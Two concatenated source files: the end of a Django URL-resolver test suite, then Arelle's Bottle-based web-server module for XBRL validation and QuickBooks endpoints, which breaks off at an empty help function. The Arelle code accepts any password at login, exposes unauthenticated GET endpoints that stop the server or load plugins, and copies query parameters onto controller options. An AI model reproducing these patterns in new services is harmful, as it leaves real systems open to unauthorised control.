                self.assertEqual(self.callable_resolver.resolve_error_handler(code), expected)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls_without_full_import')
class DefaultErrorHandlerTests(SimpleTestCase):

    def test_default_handler(self):
        """If the urls.py doesn't specify handlers, the defaults are used"""
        # Unknown URL → default 404 handler.
        self.assertEqual(self.client.get('/test/').status_code, 404)
        # A view raising an exception propagates it to the test client.
        with self.assertRaisesMessage(ValueError, "I don't think I'm getting good"):
            self.client.get('/bad_view/')
@override_settings(ROOT_URLCONF=None)
class NoRootUrlConfTests(SimpleTestCase):
    """Tests for handler404 and handler500 if ROOT_URLCONF is None"""

    def test_no_handler_exception(self):
        expected = (
            "The included URLconf 'None' does not appear to have any patterns "
            "in it. If you see valid patterns in the file then the issue is "
            "probably caused by a circular import."
        )
        with self.assertRaisesMessage(ImproperlyConfigured, expected):
            self.client.get('/test/me/')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class ResolverMatchTests(SimpleTestCase):

    def test_urlpattern_resolve(self):
        for path, url_name, app_name, namespace, view_name, func, args, kwargs in resolve_test_data:
            with self.subTest(path=path):
                # Legacy support: resolve() unpacks as (function, args, kwargs).
                legacy_func, legacy_args, legacy_kwargs = resolve(path)
                self.assertEqual(legacy_func, func)
                self.assertEqual(legacy_args, args)
                self.assertEqual(legacy_kwargs, kwargs)
                # Full ResolverMatch capabilities.
                match = resolve(path)
                self.assertEqual(match.__class__, ResolverMatch)
                self.assertEqual(match.url_name, url_name)
                self.assertEqual(match.app_name, app_name)
                self.assertEqual(match.namespace, namespace)
                self.assertEqual(match.view_name, view_name)
                self.assertEqual(match.func, func)
                self.assertEqual(match.args, args)
                self.assertEqual(match.kwargs, kwargs)
                # Indexing also works, for legacy purposes.
                self.assertEqual(match[0], func)
                self.assertEqual(match[1], args)
                self.assertEqual(match[2], kwargs)

    def test_resolver_match_on_request(self):
        response = self.client.get('/resolver_match/')
        self.assertEqual(response.resolver_match.url_name, 'test-resolver-match')

    def test_resolver_match_on_request_before_resolution(self):
        # Before URL resolution has run, resolver_match is unset.
        self.assertIsNone(HttpRequest().resolver_match)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.erroneous_urls')
class ErroneousViewTests(SimpleTestCase):

    def test_noncallable_view(self):
        # An importable but non-callable object is rejected outright.
        with self.assertRaisesMessage(TypeError, 'view must be a callable'):
            url(r'uncallable-object/$', views.uncallable)

    def test_invalid_regex(self):
        # A pattern containing a regex syntax error is reported (refs #6170).
        expected = '(regex_error/$" is not a valid regular expression'
        with self.assertRaisesMessage(ImproperlyConfigured, expected):
            reverse(views.empty_view)
class ViewLoadingTests(SimpleTestCase):
    """Tests for get_callable(): loading views from dotted paths or callables."""

    def test_view_loading(self):
        # Both a dotted path and an already-resolved callable yield the callable.
        self.assertEqual(get_callable('urlpatterns_reverse.views.empty_view'), empty_view)
        self.assertEqual(get_callable(empty_view), empty_view)

    def test_view_does_not_exist(self):
        expected = "View does not exist in module urlpatterns_reverse.views."
        with self.assertRaisesMessage(ViewDoesNotExist, expected):
            get_callable('urlpatterns_reverse.views.i_should_not_exist')

    def test_attributeerror_not_hidden(self):
        # An AttributeError raised while importing the module must surface as-is.
        expected = 'I am here to confuse django.urls.get_callable'
        with self.assertRaisesMessage(AttributeError, expected):
            get_callable('urlpatterns_reverse.views_broken.i_am_broken')

    def test_non_string_value(self):
        expected = "'1' is not a callable or a dot-notation path"
        with self.assertRaisesMessage(ViewDoesNotExist, expected):
            get_callable(1)

    def test_string_without_dot(self):
        expected = "Could not import 'test'. The path must be fully qualified."
        with self.assertRaisesMessage(ImportError, expected):
            get_callable('test')

    def test_module_does_not_exist(self):
        with self.assertRaisesMessage(ImportError, "No module named 'foo'"):
            get_callable('foo.bar')

    def test_parent_module_does_not_exist(self):
        expected = 'Parent module urlpatterns_reverse.foo does not exist.'
        with self.assertRaisesMessage(ViewDoesNotExist, expected):
            get_callable('urlpatterns_reverse.foo.bar')

    def test_not_callable(self):
        expected = (
            "Could not import 'urlpatterns_reverse.tests.resolve_test_data'. "
            "View is not callable."
        )
        with self.assertRaisesMessage(ViewDoesNotExist, expected):
            get_callable('urlpatterns_reverse.tests.resolve_test_data')
class IncludeTests(SimpleTestCase):
    # Tests of include()'s return value: a 3-tuple of
    # (urlconf, app_namespace, instance_namespace), as the asserts below show.
    url_patterns = [
        url(r'^inner/$', views.empty_view, name='urlobject-view'),
        url(r'^inner/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$', views.empty_view, name='urlobject-view'),
        url(r'^inner/\+\\\$\*/$', views.empty_view, name='urlobject-special-view'),
    ]
    # URLObject supplies an app_name ('inc-app'); used to test defaulting.
    app_urls = URLObject('inc-app')

    def test_include_urls(self):
        # A bare pattern list carries no namespaces.
        self.assertEqual(include(self.url_patterns), (self.url_patterns, None, None))

    def test_include_namespace(self):
        msg = (
            'Specifying a namespace in include() without providing an '
            'app_name is not supported.'
        )
        with self.assertRaisesMessage(ImproperlyConfigured, msg):
            include(self.url_patterns, 'namespace')

    def test_include_4_tuple(self):
        msg = 'Passing a 4-tuple to include() is not supported.'
        with self.assertRaisesMessage(ImproperlyConfigured, msg):
            include((self.url_patterns, 'app_name', 'namespace', 'blah'))

    def test_include_3_tuple(self):
        msg = 'Passing a 3-tuple to include() is not supported.'
        with self.assertRaisesMessage(ImproperlyConfigured, msg):
            include((self.url_patterns, 'app_name', 'namespace'))

    def test_include_3_tuple_namespace(self):
        msg = 'Cannot override the namespace for a dynamic module that provides a namespace.'
        with self.assertRaisesMessage(ImproperlyConfigured, msg):
            include((self.url_patterns, 'app_name', 'namespace'), 'namespace')

    def test_include_2_tuple(self):
        # (patterns, app_name): instance namespace defaults to app_name.
        self.assertEqual(
            include((self.url_patterns, 'app_name')),
            (self.url_patterns, 'app_name', 'app_name')
        )

    def test_include_2_tuple_namespace(self):
        self.assertEqual(
            include((self.url_patterns, 'app_name'), namespace='namespace'),
            (self.url_patterns, 'app_name', 'namespace')
        )

    def test_include_app_name(self):
        # The URLObject's own app_name doubles as the default namespace.
        self.assertEqual(
            include(self.app_urls),
            (self.app_urls, 'inc-app', 'inc-app')
        )

    def test_include_app_name_namespace(self):
        self.assertEqual(
            include(self.app_urls, 'namespace'),
            (self.app_urls, 'inc-app', 'namespace')
        )
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class LookaheadTests(SimpleTestCase):
    # Resolution and reversal of URL patterns that contain regex lookahead /
    # lookbehind assertions (the '+'/'-' URL segments name the positive and
    # negative variants).

    def test_valid_resolve(self):
        test_urls = [
            '/lookahead-/a-city/',
            '/lookbehind-/a-city/',
            '/lookahead+/a-city/',
            '/lookbehind+/a-city/',
        ]
        for test_url in test_urls:
            with self.subTest(url=test_url):
                self.assertEqual(resolve(test_url).kwargs, {'city': 'a-city'})

    def test_invalid_resolve(self):
        # URLs rejected by the assertion should not resolve at all.
        test_urls = [
            '/lookahead-/not-a-city/',
            '/lookbehind-/not-a-city/',
            '/lookahead+/other-city/',
            '/lookbehind+/other-city/',
        ]
        for test_url in test_urls:
            with self.subTest(url=test_url):
                with self.assertRaises(Resolver404):
                    resolve(test_url)

    def test_valid_reverse(self):
        test_urls = [
            ('lookahead-positive', {'city': 'a-city'}, '/lookahead+/a-city/'),
            ('lookahead-negative', {'city': 'a-city'}, '/lookahead-/a-city/'),
            ('lookbehind-positive', {'city': 'a-city'}, '/lookbehind+/a-city/'),
            ('lookbehind-negative', {'city': 'a-city'}, '/lookbehind-/a-city/'),
        ]
        for name, kwargs, expected in test_urls:
            with self.subTest(name=name, kwargs=kwargs):
                self.assertEqual(reverse(name, kwargs=kwargs), expected)

    def test_invalid_reverse(self):
        # Arguments rejected by the assertion should fail to reverse.
        test_urls = [
            ('lookahead-positive', {'city': 'other-city'}),
            ('lookahead-negative', {'city': 'not-a-city'}),
            ('lookbehind-positive', {'city': 'other-city'}),
            ('lookbehind-negative', {'city': 'not-a-city'}),
        ]
        for name, kwargs in test_urls:
            with self.subTest(name=name, kwargs=kwargs):
                with self.assertRaises(NoReverseMatch):
                    reverse(name, kwargs=kwargs)
|
CntlrWebMain.py | '''
Created on Oct 3, 2010
Use this module to start Arelle in web server mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle.webserver.bottle import Bottle, request, response, static_file
import os, io, sys, time, threading, uuid
from arelle import Version
from arelle.FileSource import FileNamedStringIO
_os_pid = os.getpid()
def startWebserver(_cntlr, options):
    """Called once from main program in CntlrCmdLine to initiate web server on specified local port.

    To test WebServer run from source in IIS, use an entry like this: c:\python33\python.exe c:\\users\\myname\\mySourceFolder\\arelleCmdLine.py %s

    :param _cntlr: the application controller; stored module-globally for the request handlers
    :param options: OptionParser options from parse_args of main argv arguments (the argument *webserver* provides hostname and port), port being used to startup the webserver on localhost.
    :type options: optparse.Values
    """
    global imagesDir, cntlr, optionsPrototype
    cntlr = _cntlr
    imagesDir = cntlr.imagesDir
    # Snapshot the str/number-valued (or None) public option attributes as a
    # prototype dict, so request handlers can start from the command-line defaults.
    optionValuesTypes = _STR_NUM_TYPES + (type(None),)
    optionsPrototype = dict((option,value if isinstance(value,_STR_NUM_TYPES) else None)
                            for option in dir(options)
                            for value in (getattr(options, option),)
                            if isinstance(value,optionValuesTypes) and not option.startswith('_'))
    # options.webserver has the form "host:port[:server]" where the optional
    # third field selects a bottle server backend (e.g. "cgi", "wsgi").
    host, sep, portServer = options.webserver.partition(":")
    port, sep, server = portServer.partition(":")
    # start a Bottle application
    app = Bottle()
    GETorPOST = ('GET', 'POST')
    GET = 'GET'
    POST = 'POST'
    # install REST API interfaces
    # if necessary to support CGI hosted servers below root, add <prefix:path> as first part of routes
    # and corresponding arguments to the handler methods
    app.route('/rest/login', GET, login_form)
    app.route('/rest/login', POST, login_submit)
    app.route('/rest/logout', GET, logout)
    app.route('/favicon.ico', GET, arelleIcon)
    # validation() multiplexes all of the per-file open/close/validate/view routes
    app.route('/rest/xbrl/<file:path>/open', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/close', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/validation/xbrl', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/DTS', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/concepts', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/pre', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/cal', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/dim', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/facts', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/factTable', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/roleTypes', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/arcroleTypes', GETorPOST, validation)
    app.route('/rest/xbrl/<file:path>/formulae', GETorPOST, validation)
    app.route('/rest/xbrl/validation', GETorPOST, validation)
    app.route('/rest/xbrl/view', GETorPOST, validation)
    app.route('/rest/xbrl/open', GETorPOST, validation)
    app.route('/rest/xbrl/close', GETorPOST, validation)
    app.route('/images/<imgFile>', GET, image)
    app.route('/rest/xbrl/diff', GET, diff)
    app.route('/rest/configure', GET, configure)
    app.route('/rest/stopWebServer', GET, stopWebServer)
    # QuickBooks XBRL-GL integration endpoints
    app.route('/quickbooks/server.asmx', POST, quickbooksServer)
    app.route('/rest/quickbooks/<qbReport>/xbrl-gl/<file:path>', GET, quickbooksGLrequest)
    app.route('/rest/quickbooks/<qbReport>/xbrl-gl/<file:path>/view', GET, quickbooksGLrequest)
    app.route('/rest/quickbooks/<qbReport>/xbrl-gl/view', GET, quickbooksGLrequest)
    app.route('/rest/quickbooks/response', GET, quickbooksGLresponse)
    app.route('/quickbooks/server.html', GET, quickbooksWebPage)
    app.route('/quickbooks/localhost.crt', GET, localhostCertificate)
    app.route('/localhost.crt', GET, localhostCertificate)
    app.route('/help', GET, helpREST)
    app.route('/about', GET, about)
    app.route('/', GET, indexPageREST)
    if server == "cgi":
        # catch a non-REST interface by cgi Interface (may be a cgi app exe module, etc)
        app.route('<cgiAppPath:path>', GETorPOST, cgiInterface)
    if server == "wsgi":
        # hand the WSGI application back to the hosting server
        return app
    elif server == "cgi":
        # CGI hosts may not provide stdin; bottle's CGI adapter expects one
        if sys.stdin is None:
            sys.stdin = open(os.devnull, 'r')
        app.run(server=server)
        sys.exit(0)
    elif server:
        # run under the named bottle server backend
        app.run(host=host, port=port or 80, server=server)
    else:
        # default: bottle's built-in single-threaded server
        app.run(host=host, port=port or 80)
def cgiInterface(cgiAppPath):
    """Dispatch a catch-all CGI request to the matching REST handler.

    Routing is decided from the query-string parameters; with no parameters
    (or no recognized parameter) the index page is returned.
    """
    query = request.query
    if not query:  # no parameters: index page
        return indexPageCGI()
    if 'about' in query:
        return about(cgiAppPath + "?image=arelle32.gif")
    if 'help' in query:
        return helpREST()
    if 'image' in query:
        return image(query.image)
    return indexPageCGI()
def login_form():
    """Serve the login form (get to */rest/login*).

    Other providers of XBRL validation services require a login; this
    version of Arelle performs no accounting or charging, so the submitted
    credentials are effectively ignored.

    :returns: str -- HTML login form to enter and submit via method=POST these fields: name, password
    """
    formHtml = _('''<html><body><form method="POST"><table>
<tr><td>Name:</td><td><input name="name" type="text" /></td></tr>
<tr><td>Password:</td><td><input name="password" type="password" /></td></tr>
<tr><td> </td><td><input type="submit" value="Submit" /></td></tr>
</table></form></body></html>''')
    return formHtml
def login_submit():
    """Process the login form (post to */rest/login*). Saves user ID for future use.

    :param name: User ID (form field)
    :param password: Password (form field; not currently verified)
    """
    submittedName = request.forms.get('name')
    submittedPassword = request.forms.get('password')
    if not checkLogin(submittedName, submittedPassword):
        return _("<p>Login failed</p>")
    return _("<p>You are logged in as user: {0}</p>").format(submittedName)
def checkLogin(_user, _password):
    """Record the user ID for later requests; the password is not verified.

    :returns: bool -- always True (a future version may consult an
        authentication/accounting service)
    """
    global user
    user = _user
    return True
def logout():
    """Log the user out (get */rest/logout*), discarding any prior user ID.

    :returns: html -- Message confirming the user has logged out
    """
    global user
    user = None
    return _("<p>You are logged out.</p>")
def arelleIcon():
    """Request for icon for URL display (get */favicon.ico*).

    :returns: ico -- Icon file for browsers
    """
    # imagesDir is the application's images directory, set at module scope
    return static_file("arelle.ico", root=imagesDir, mimetype='image/vnd.microsoft.icon')
def image(imgFile):
    """Request for an image file for URL display (get */images/<imgFile>*).

    :param imgFile: image file name within the application's images directory
    :returns: image file -- Requested image file from images directory of application for browsers
    """
    # served via bottle's static_file from imagesDir (presumably static_file
    # rejects paths escaping root -- confirm against the bottle version in use)
    return static_file(imgFile, root=imagesDir)
# Maps recognized query-parameter names to (CntlrCmdLine option name, value).
# A fixed value is applied as-is; a value of None means the text supplied
# with the query parameter passes through as the option's value.
validationOptions = {
    # these options have no value (after + in query)
    "efm": ("validateEFM", True),
    "efm-pragmatic": ("disclosureSystemName", "efm-pragmatic"),
    "efm-strict": ("disclosureSystemName", "efm-strict"),
    "disclosure-system": ("disclosureSystemName", None),
    "ifrs": ("gfmName", "ifrs"),
    "hmrc": ("gfmName", "hmrc"),
    "sbr-nl": ("gfmName", "sbr-nl"),
    "utr": ("utrValidate", True),
    "infoset": ("infosetValidate", True),
    # these parameters pass through the value after + in query
    "import": ("importFiles", None),
    }
class Options():
    """Attribute bag emulating the options object expected by CntlrCmdLine.run.

    Each option named in the module-level optionsPrototype is initialized to
    its prototype default; request handlers then overwrite individual
    attributes from query parameters.
    """
    def __init__(self):
        for optionName, prototypeDefault in optionsPrototype.items():
            setattr(self, optionName, prototypeDefault)
# view names accepted as the trailing URL segment or the "view" query parameter
supportedViews = {'DTS', 'concepts', 'pre', 'cal', 'dim', 'facts', 'factTable', 'formulae', 'roleTypes', 'arcroleTypes'}
def validation(file=None):
    """REST request to validate, by *get* or *post*, to URL patterns including */rest/xbrl/<file:path>/{open|close|validation|DTS...}*,
    and */rest/xbrl/{view|open|close}*.
    Sets up CntlrCmdLine options for the request, performed by runOptionsAndGetResult using CntlrCmdLine.run with get or post arguments.

    :param file: entry-point file path captured from the URL, if any; may
        alternatively be supplied as the ``file`` query parameter
    :returns: html, xhtml, xml, json, text -- Return per media type argument and request arguments
    """
    errors = []
    flavor = request.query.flavor or 'standard'
    media = request.query.media or 'html'
    # the request verb/view is the last URL segment; 'validation' may also
    # appear one segment earlier (e.g. .../validation/xbrl)
    requestPathParts = request.urlparts[2].split('/')
    isValidation = 'validation' == requestPathParts[-1] or 'validation' == requestPathParts[-2]
    view = request.query.view
    viewArcrole = request.query.viewArcrole
    if request.method == 'POST':
        # POSTed content must be a zip archive containing the entry file
        sourceZipStream = request.body
        mimeType = request.get_header("Content-Type")
        if mimeType not in ('application/zip', 'application/x-zip', 'application/x-zip-compressed', 'multipart/x-zip'):
            errors.append(_("POST must provide a zip file, Content-Type '{0}' not recognized as a zip file.").format(mimeType))
    else:
        sourceZipStream = None
    if not view and not viewArcrole:
        # infer the view from the last URL segment, e.g. .../c.xbrl/dim
        if requestPathParts[-1] in supportedViews:
            view = requestPathParts[-1]
    # validation and views are mutually exclusive; check media per mode
    if isValidation:
        if view or viewArcrole:
            errors.append(_("Only validation or one view can be specified in one requested."))
        if media not in ('xml', 'xhtml', 'html', 'json', 'text') and not (sourceZipStream and media == 'zip'):
            errors.append(_("Media '{0}' is not supported for validation (please select xhtml, html, xml, json or text)").format(media))
    elif view or viewArcrole:
        if media not in ('xml', 'xhtml', 'html', 'csv', 'json'):
            errors.append(_("Media '{0}' is not supported for view (please select xhtml, html, xml, csv, or json)").format(media))
    elif requestPathParts[-1] not in ("open", "close"):
        errors.append(_("Neither validation nor view requested, nothing to do."))
    if (flavor not in ('standard', 'standard-except-formula', 'formula-compile-only', 'formula-compile-and-run')
        and not flavor.startswith('edgar') and not flavor.startswith('sec')):
        errors.append(_("Flavor '{0}' is not supported").format(flavor))
    if view and view not in supportedViews:
        errors.append(_("View '{0}' is not supported").format(view))
    if errors:
        errors.insert(0, _("URL: ") + (file or request.query.file or '(no file)'))
        return errorReport(errors, media)
    options = Options() # need named parameters to simulate options
    isFormulaOnly = False
    # map each remaining query parameter onto a CntlrCmdLine option
    for key, value in request.query.items():
        if key == "file":
            setattr(options, "entrypointFile", value)
        elif key == "flavor":
            if value.startswith("sec") or value.startswith("edgar"):
                setattr(options, "validateEFM", True)
            elif value == "formula-compile-only":
                isFormulaOnly = True
                setattr(options, "formulaAction", "validate")
            elif value == "formula-compile-and-run":
                isFormulaOnly = True
                setattr(options, "formulaAction", "run")
            elif value == "standard-except-formula":
                setattr(options, "formulaAction", "none")
        elif key in("media", "view", "viewArcrole"):
            pass  # already consumed above
        elif key in validationOptions:
            # recognized validation option; None optionValue means the query
            # value passes through as the option's value
            optionKey, optionValue = validationOptions[key]
            setattr(options, optionKey, optionValue if optionValue is not None else value)
        elif not value: # convert plain str parameter present to True parameter
            setattr(options, key, True)
        else:
            setattr(options, key, value)
    if file:
        # ";" may be used in place of "/" within the {file} URL segment
        setattr(options, "entrypointFile", file.replace(';','/'))
    requestPathParts = set(request.urlparts[2].split('/'))
    viewFile = None
    if isValidation:
        if not isFormulaOnly:
            setattr(options, "validate", True)
    elif view:
        # view output is rendered into an in-memory file per requested media
        viewFile = FileNamedStringIO(media)
        setattr(options, view + "File", viewFile)
    elif viewArcrole:
        viewFile = FileNamedStringIO(media)
        setattr(options, "viewArcrole", viewArcrole)
        setattr(options, "viewFile", viewFile)
    return runOptionsAndGetResult(options, media, viewFile, sourceZipStream)
def runOptionsAndGetResult(options, media, viewFile, sourceZipStream=None):
    """Execute request according to options, for result in media, with *post*ed file in sourceZipStream, if any.

    :param options: Options instance configured for CntlrCmdLine.run
    :param media: requested result media type (html, xhtml, xml, csv, json, text, zip)
    :param viewFile: in-memory file receiving a view rendering, or None
    :param sourceZipStream: zip archive POSTed with the request, if any
    :returns: html, xml, csv, text -- Return per media type argument and request arguments
    """
    if media == "zip" and not viewFile:
        # zip result requested: collect controller output into a zip stream
        responseZipStream = io.BytesIO()
    else:
        responseZipStream = None
    successful = cntlr.run(options, sourceZipStream, responseZipStream)
    # set the HTTP content type per requested media
    if media == "xml":
        response.content_type = 'text/xml; charset=UTF-8'
    elif media == "csv":
        response.content_type = 'text/csv; charset=UTF-8'
    elif media == "json":
        response.content_type = 'application/json; charset=UTF-8'
    elif media == "text":
        response.content_type = 'text/plain; charset=UTF-8'
    elif media == "zip":
        response.content_type = 'application/zip; charset=UTF-8'
    else:
        response.content_type = 'text/html; charset=UTF-8'
    if successful and viewFile:
        # defeat re-encoding: replace HTML entity references emitted into the
        # view with their literal characters.  (The previous code had the
        # entity names stripped by entity decoding -- e.g. replace("&","&"),
        # a no-op -- so no de-escaping was actually performed.)
        result = viewFile.getvalue().replace("&nbsp;","\u00A0").replace("&shy;","\u00AD").replace("&amp;","&")
        viewFile.close()
    elif media == "zip":
        responseZipStream.seek(0)
        result = responseZipStream.read()
        responseZipStream.close()
    elif media == "xml":
        result = cntlr.logHandler.getXml()
    elif media == "json":
        result = cntlr.logHandler.getJson()
    elif media == "text":
        result = cntlr.logHandler.getText()
    else:
        result = htmlBody(tableRows(cntlr.logHandler.getLines(), header=_("Messages")))
    return result
def diff():
    """Execute versioning diff request for *get* request to */rest/xbrl/diff*.

    Requires fromDTS, toDTS and report query parameters; the report is not
    written to disk -- its contents are returned in the response body.
    :returns: xml -- Versioning report.
    """
    query = request.query
    if not query.fromDTS or not query.toDTS or not query.report:
        return _("From DTS, to DTS, and report must be specified")
    options = Options()
    options.entrypointFile = query.fromDTS
    options.diffFile = query.toDTS
    reportFile = FileNamedStringIO(query.report)
    options.versReportFile = reportFile
    cntlr.run(options)
    reportContents = reportFile.getvalue()
    reportFile.close()
    response.content_type = 'text/xml; charset=UTF-8'
    return reportContents
def configure():
    """Set up features for *get* requests to */rest/configure*, e.g., proxy or plug-ins.

    :returns: html -- Status of configuration request (e.g., proxy or plug-ins).
    """
    query = request.query
    if not query.proxy and not query.plugins and not query.packages and 'environment' not in query:
        return _("proxy, plugins, packages or environment must be specified")
    options = Options()
    if query.proxy:
        options.proxy = query.proxy
    if query.plugins:
        options.plugins = query.plugins
    if query.packages:
        options.packages = query.packages
    if 'environment' in query:
        options.showEnvironment = True
    cntlr.run(options)
    response.content_type = 'text/html; charset=UTF-8'
    return htmlBody(tableRows(cntlr.logHandler.getLines(), header=_("Configuration Request")))
def stopWebServer():
    """Stop the web server for *get* requests to */rest/stopWebServer*.

    Replies immediately, then a daemon thread sends SIGTERM to this process
    after a short delay so the HTTP response can be delivered first.
    """
    def _terminateLater(delaySeconds):
        time.sleep(delaySeconds)
        import signal
        os.kill(_os_pid, signal.SIGTERM)
    threading.Thread(target=_terminateLater, args=(2.5,), daemon=True).start()
    response.content_type = 'text/html; charset=UTF-8'
    return htmlBody(tableRows((time.strftime("Received at %Y-%m-%d %H:%M:%S"),
                               "Good bye...",),
                              header=_("Stop Request")))
def quickbooksServer():
    """Interface to QuickBooks server responding to *post* requests to */quickbooks/server.asmx*.
    (Part of QuickBooks protocol, see module CntlrQuickBooks.)

    :returns: xml -- response produced by CntlrQuickBooks.server
    """
    # deferred import: QuickBooks support is only loaded when this endpoint is hit
    from arelle import CntlrQuickBooks
    response.content_type = 'text/xml; charset=UTF-8'
    return CntlrQuickBooks.server(cntlr, request.body, request.urlparts)
def quickbooksGLrequest(qbReport=None, file=None):
    """Initiate request to QuickBooks server for *get* requests to */rest/quickbooks/<qbReport>/xbrl-gl/...*.

    :param qbReport: QuickBooks report type from the URL (validated against supportedQbReports)
    :param file: output instance file path from the URL, if any
    :returns: html, xml, csv, text -- Return per media type argument and request arguments
    """
    from arelle.CntlrQuickBooks import supportedQbReports, qbRequest
    from arelle.ModelValue import dateTime
    errors = []
    requestPathParts = request.urlparts[2].split('/')
    viewRequested = "view" == requestPathParts[-1]
    media = request.query.media or 'html'
    fromDate = request.query.fromDate
    toDate = request.query.toDate
    # validate report type, media, and date range before queuing anything
    if qbReport not in supportedQbReports:
        errors.append(_("QuickBooks report '{0}' is not supported (please select from: {1})").format(
            qbReport, ', '.join(supportedQbReports)))
    if media not in ('xml', 'xhtml', 'html'):
        errors.append(_("Media '{0}' is not supported for xbrl-gl (please select xhtml, html or xml)").format(media))
    if not fromDate or dateTime(fromDate) is None:
        errors.append(_("FromDate '{0}' missing or not valid").format(fromDate))
    if not toDate or dateTime(toDate) is None:
        errors.append(_("ToDate '{0}' missing or not valid").format(toDate))
    if errors:
        return errorReport(errors, media)
    # queue the request; the QuickBooks Web Connector polls and fulfills it
    ticket = qbRequest(qbReport, fromDate, toDate, file)
    # returned page polls /rest/quickbooks/response every 10 seconds with the ticket
    result = htmlBody(tableRows([_("Request queued for QuickBooks...")], header=_("Quickbooks Request")), script='''
<script type="text/javascript">
<!--
var timer = setInterval("autoRefresh()", 1000 * 10);
function autoRefresh(){{location.href = "/rest/quickbooks/response?ticket={0}&media={1}&view={2}";}}
//-->
</script>
'''.format(ticket, media, viewRequested))
    return result
def quickbooksGLresponse():
    """Poll for QuickBooks protocol responses for *get* requests to */rest/quickbooks/response*.

    :returns: html, xml, csv, text -- Return per media type argument and request arguments, if response is ready, otherwise javascript to requery this *get* request periodically.
    """
    from arelle import CntlrQuickBooks
    ticket = request.query.ticket
    media = request.query.media
    viewRequested = request.query.view
    status = CntlrQuickBooks.qbRequestStatus.get(ticket)
    if not status:
        return htmlBody(tableRows([_("QuickBooks ticket not found, request canceled.")], header=_("Quickbooks Request")))
    if status.startswith("ConnectionErrorMessage: "):
        CntlrQuickBooks.qbRequestStatus.pop(ticket, None)
        # strip the "ConnectionErrorMessage: " prefix (24 characters)
        return errorReport([status[24:]], media)
    if status != "Done" or ticket not in CntlrQuickBooks.xbrlInstances:
        # not ready yet: return a page that reloads itself every 20 seconds
        return htmlBody(tableRows([_("{0}, Waiting 20 seconds...").format(status)],
                                  header=_("Quickbooks Request")),
                        script='''
<script type="text/javascript">
<!--
var timer = setInterval("autoRefresh()", 1000 * 20);
function autoRefresh(){{clearInterval(timer);self.location.reload(true);}}
//-->
</script>
''')
    # response is ready: consume the ticket and render the generated instance
    CntlrQuickBooks.qbRequestStatus.pop(ticket)
    instanceUuid = CntlrQuickBooks.xbrlInstances[ticket]
    CntlrQuickBooks.xbrlInstances.pop(ticket)
    options = Options()
    setattr(options, "entrypointFile", instanceUuid)
    viewFile = FileNamedStringIO(media)
    setattr(options, "factsFile", viewFile)
    return runOptionsAndGetResult(options, media, viewFile)
def quickbooksWebPage():
    """Serve the QuickBooks interface status page (get */quickbooks/server.html*).

    :returns: html -- static description of the QuickBooks GL interface
    """
    return htmlBody(_('''<table width="700p">
<tr><th colspan="2">Arelle QuickBooks Global Ledger Interface</th></tr>
<tr><td>checkbox</td><td>Trial Balance.</td></tr>
<tr><td>close button</td><td>Done</td></tr>
</table>'''))
def localhostCertificate():
    """Interface to QuickBooks server responding to *get* requests for a host certificate */quickbooks/localhost.crt* or */localhost.crt*.
    (Supports QuickBooks protocol.)

    :returns: self-signed certificate
    """
    # NOTE(review): hard-coded self-signed certificate for localhost; its
    # validity window is fixed at issuance and may have expired -- confirm
    # whether clients still accept it or it needs regeneration.
    return '''
-----BEGIN CERTIFICATE-----
MIIDljCCAn4CAQAwDQYJKoZIhvcNAQEEBQAwgZAxCzAJBgNVBAYTAlVTMRMwEQYD
VQQIEwpDYWxpZm9ybmlhMQ8wDQYDVQQHEwZFbmNpbm8xEzARBgNVBAoTCmFyZWxs
ZS5vcmcxDzANBgNVBAsTBmFyZWxsZTESMBAGA1UEAxMJbG9jYWxob3N0MSEwHwYJ
KoZIhvcNAQkBFhJzdXBwb3J0QGFyZWxsZS5vcmcwHhcNMTIwMTIwMDg0NjM1WhcN
MTQxMDE1MDg0NjM1WjCBkDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3Ju
aWExDzANBgNVBAcTBkVuY2lubzETMBEGA1UEChMKYXJlbGxlLm9yZzEPMA0GA1UE
CxMGYXJlbGxlMRIwEAYDVQQDEwlsb2NhbGhvc3QxITAfBgkqhkiG9w0BCQEWEnN1
cHBvcnRAYXJlbGxlLm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMJEq9zT4cdA2BII4TG4OJSlUP22xXqNAJdZZeB5rTIX4ePwIZ8KfFh/XWQ1/q5I
c/rkZ5TyC+SbEmQa/unvv1CypMAWWMfuguU6adOsxt+zFFMJndlE1lr3A2SBjHbD
vBGzGJJTivBzDPBIQ0SGcf32usOeotmE2PA11c5en8/IsRXm9+TA/W1xL60mfphW
9PIaJ+WF9rRROjKXVdQZTRFsNRs/Ag8o3jWEyWYCwR97+XkorYsAJs2TE/4zV+8f
8wKuhOrsy9KYFZz2piVWaEC0hbtDwX1CqN+1oDHq2bYqLygUSD/LbgK1lxM3ciVy
ewracPVHBErPlcJFxiOxAw0CAwEAATANBgkqhkiG9w0BAQQFAAOCAQEAM2np3UVY
6g14oeV0Z32Gn04+r6FV2D2bobxCVLIQDsWGEv1OkjVBJTu0bLsZQuNVZHEn5a+2
I0+MGME3HK1rx1c8MrAsr5u7ZLMNj7cjjtFWAUp9GugJyOmGK136o4/j1umtBojB
iVPvHsAvwZuommfME+AaBE/aJjPy5I3bSu8x65o1fuJPycrSeLAnLd/shCiZ31xF
QnJ9IaIU1HOusplC13A0tKhmRMGNz9v+Vqdj7J/kpdTH7FNMulrJTv/0ezTPjaOB
QhpLdqly7hWJ23blbQQv4ILT2CiPDotJslcKDT7GzvPoDu6rIs2MpsB/4RDYejYU
+3cu//C8LvhjkQ==
-----END CERTIFICATE-----
'''
def helpREST():
